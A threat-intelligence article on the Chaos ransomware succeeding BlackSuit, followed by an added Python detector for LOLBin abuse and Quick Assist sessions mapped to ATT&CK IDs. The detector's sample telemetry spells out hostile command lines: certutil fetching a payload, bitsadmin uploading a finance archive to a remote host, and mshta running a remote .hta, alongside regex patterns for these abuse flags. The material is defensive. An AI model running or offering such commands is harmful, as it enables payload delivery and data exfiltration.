Chaos Ransomware Emerges from BlackSuit After Take-Down

In July 2025, international law enforcement dismantled BlackSuit, but the cybercrime landscape shifted almost immediately: a new ransomware-as-a-service (RaaS) operation calling itself Chaos has taken its place. Cisco Talos and other threat intelligence teams warn that Chaos is already targeting large organizations across multiple continents.
Backdrop: Operation CheckMate Dismantles BlackSuit
Under Operation CheckMate, agencies from the U.S., EU and Ukraine collaborated to seize BlackSuit’s Tor hidden services and C2 infrastructure:
- Seized servers in the Netherlands and Germany
- Preserved encrypted evidence for digital forensics
- Joint effort by DOJ, DHS, US Secret Service, Europol, Ukrainian Cyber Police, UK NCA and more
“BlackSuit had extorted over $500 million in ransoms in fewer than two years. Disrupting its infrastructure delivers a significant blow to ransomware ecosystems,” said an official spokesperson at Europol.
Enterprise-Scale Attacks: Chaos’s Big-Game Hunting
Since its emergence in February 2025, Chaos has demonstrated “big-game hunting” tactics, focusing on high-value targets in the US, UK, India and New Zealand and demanding ransoms averaging $250,000–$350,000. Victims receive a “readme.chaos.txt” note threatening data exfiltration, public disclosure, and DDoS if they refuse to pay.
Technical Deep Dive: Encryption and Attack Tools
Chaos employs a hybrid cryptosystem: AES-256 for bulk file encryption plus RSA-2048 to secure the session key. Analysis of a sample binary reveals:
- ChaCha20 stream cipher fallback for large-volume encryption
- Custom PE packer with anti-debugging routines and dynamic API resolution
- Integration with Cobalt Strike beacons for C2 communication over HTTPS
Living-off-the-land binaries (LOLBins) are abused for stealth: certutil.exe drops payloads, bitsadmin.exe stages exfiltration, and mshta.exe runs obfuscated scripts in memory.
Initial Access and Tactics
Chaos gains entry via social engineering: spear-phishing emails with weaponized Office macros, or voice phishing that convinces helpdesk staff to launch Microsoft Quick Assist. Once inside, actors escalate privileges through Impacket tools and deploy remote monitoring & management (RMM) agents.
Law Enforcement Countermeasures and Operation CheckMate
Technical forensics teams used disk images and network traffic captures to trace BlackSuit’s affiliate network. By sinkholing C2 domains and tracking cryptocurrency wallets, investigators disrupted payment flows and harvested decryption keys to assist victims.
Threat Intelligence and Future Outlook
“We assess Chaos is either a BlackSuit rebrand or staffed by former members,” said research lead Matt Watcher at Cisco Talos. “Their TTPs mirror Royal and Conti lineages in methodology and code reuse.”
Experts at Mandiant and CrowdStrike predict that frequent rebranding and affiliate churn will persist. Defenders should map Chaos tactics to the MITRE ATT&CK framework (T1486: Data Encrypted for Impact, T1566: Phishing) and deploy behavior-based EDR/XDR solutions.
Key Recommendations for Enterprises:
- Enforce MFA on RDP and VPN endpoints
- Monitor unusual Quick Assist sessions and LOLbin executions
- Share indicators of compromise (IOCs) via threat intelligence platforms
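The following is an added example, not code from the article or from Cisco Talos, showing how the LOLBin abuse, the Office-macro-spawned script hosts and the Quick Assist sessions described above can be picked out of process-creation telemetry and tagged with MITRE ATT&CK technique IDs. The event field names (image, parent_image, command_line, user), the sample events and the IP addresses in them are constructed for this example; the command-line patterns are the common abuse styles of the tools the article names, and the ATT&CK IDs beyond T1486 and T1566 (T1105, T1197, T1218.005, T1219, T1566.001) are real technique identifiers.

```python
"""Detect LOLBin abuse and Quick Assist sessions in process-creation events.

Added example (not from the article). Assumes Sysmon-style events flattened to
dicts with the keys image, parent_image, command_line and user.
"""
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# (rule name, process basename, command-line pattern, ATT&CK technique)
RULES: List[Tuple[str, str, "re.Pattern[str]", str]] = [
    ("certutil payload download/decode", "certutil.exe",
     re.compile(r"-urlcache|-decode|-encode", re.I), "T1105"),
    ("bitsadmin transfer job", "bitsadmin.exe",
     re.compile(r"/transfer|/addfile|/upload", re.I), "T1197"),
    ("mshta remote or inline script", "mshta.exe",
     re.compile(r"https?://|vbscript:|javascript:|\.hta\b", re.I), "T1218.005"),
    # Any Quick Assist launch is worth a look; helpdesk-initiated sessions
    # are exactly the vector the article describes.
    ("Quick Assist session started", "quickassist.exe",
     re.compile(r""), "T1219"),
]

# Office applications that should not normally spawn script or download hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Dict[str, str]]:
    """Return one finding per matched rule; an event may yield several."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        image = basename(ev.get("image", ""))
        parent = basename(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        for name, target, pattern, technique in RULES:
            if image == target and pattern.search(cmd):
                findings.append({"rule": name, "technique": technique,
                                 "image": image, "user": ev.get("user", ""),
                                 "command_line": cmd})
        # Macro-laden documents launching a script host: the spear-phishing path.
        if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            findings.append({"rule": "Office document spawned script host",
                             "technique": "T1566.001", "image": image,
                             "user": ev.get("user", ""), "command_line": cmd})
    return findings


# Constructed sample telemetry; 198.51.100.0/24 and 203.0.113.0/24 are
# documentation ranges, not real infrastructure.
SAMPLE_EVENTS: List[Event] = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://198.51.100.7/upd.bin C:\Users\Public\upd.bin",
     "user": r"CORP\jdoe"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"bitsadmin /transfer stage /upload http://198.51.100.7/in C:\Finance\q2.zip",
     "user": r"CORP\jdoe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe https://203.0.113.5/update.hta",
     "user": r"CORP\jdoe"},
    {"image": r"C:\Windows\System32\QuickAssist.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "QuickAssist.exe",
     "user": r"CORP\helpdesk01"},
    # Benign certutil use: must not fire.
    {"image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil -verify server.cer",
     "user": r"CORP\admin"},
]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f['technique']}] {f['rule']}: {f['user']} ran {f['command_line']}")
```

Running the block prints five findings: the certutil download, the bitsadmin upload, the mshta launch (once for the remote .hta and once because WINWORD.EXE is its parent) and the Quick Assist session; the benign certutil -verify produces nothing. In production the same rule table would be fed from an EDR or SIEM export rather than the inline list, and the parent-process rule is the one most worth tuning, since some line-of-business add-ins legitimately spawn cmd.exe from Office.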